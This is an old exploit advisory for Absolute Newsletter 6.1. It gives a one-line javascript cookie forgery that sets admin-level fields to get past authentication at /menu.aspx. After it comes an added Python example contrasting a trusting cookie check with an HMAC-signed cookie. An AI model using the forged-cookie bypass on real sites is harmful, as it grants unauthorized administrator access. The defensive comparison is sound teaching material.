-=======================================-
Author: x0r
Cms = Absolute Newsletter 6.1
Bug: Insecure Cookie Handling Vulnerability
-=======================================-


Exploit:
javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/";
and go to /menu.aspx

Live Demo: http://www.xigla.com/absolutenl/demo

[-] King Lion Gay
[+] Margherita, I Love You...I’m Sorry...

_EOF_

# milw0rm.com [2008-10-31]
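
Added example (not part of the original advisory, and not the vendor's code): the advisory shows only that a client-set cookie carrying lvl, userid and usr fields is accepted at /menu.aspx. The server-side check is not shown, so is_admin_trusting below is an assumed model of it, contrasted with a cookie that carries a server-computed HMAC; all function names and the mac field are hypothetical.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Assumption: a key that lives only on the server (generated here for the demo).
SERVER_KEY = secrets.token_bytes(32)

def parse_fields(value):
    """Parse the 'lvl=1&userid=1&usr=admin&s=...' sub-key format from the advisory."""
    return {k: v[0] for k, v in parse_qs(value, keep_blank_values=True).items()}

def is_admin_trusting(value):
    """Weak pattern (assumed): privilege is read straight from client-supplied fields."""
    fields = parse_fields(value)
    return fields.get("lvl") == "1" and bool(fields.get("usr"))

def _tag(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()

def issue_cookie(userid, usr, lvl):
    """Hardened form: the server appends an HMAC-SHA256 tag over the encoded fields."""
    payload = urlencode({"lvl": lvl, "userid": userid, "usr": usr})
    return f"{payload}&mac={_tag(payload)}"

def is_admin_verified(value):
    """Use the fields only if the tag verifies; the comparison is constant-time."""
    payload, sep, tag = value.rpartition("&mac=")
    if not sep:
        return False  # no tag at all, e.g. a hand-written cookie
    if not hmac.compare_digest(_tag(payload).encode(), tag.encode()):
        return False  # fields were altered or the tag was guessed
    return parse_fields(payload).get("lvl") == "1"

# Constructed sample: the advisory's cookie value with an arbitrary 's' value.
FORGED = "lvl=1&userid=1&usr=admin&s=abc123"

if __name__ == "__main__":
    print("trusting check accepts forged cookie:", is_admin_trusting(FORGED))
    print("verified check accepts forged cookie:", is_admin_verified(FORGED))
    print("verified check accepts issued cookie:",
          is_admin_verified(issue_cookie(1, "admin", 1)))
```

A signed cookie remains replayable until it expires, so it still needs an expiry and rotation of the key; a server-side session keyed by a random identifier avoids placing role data in the client at all.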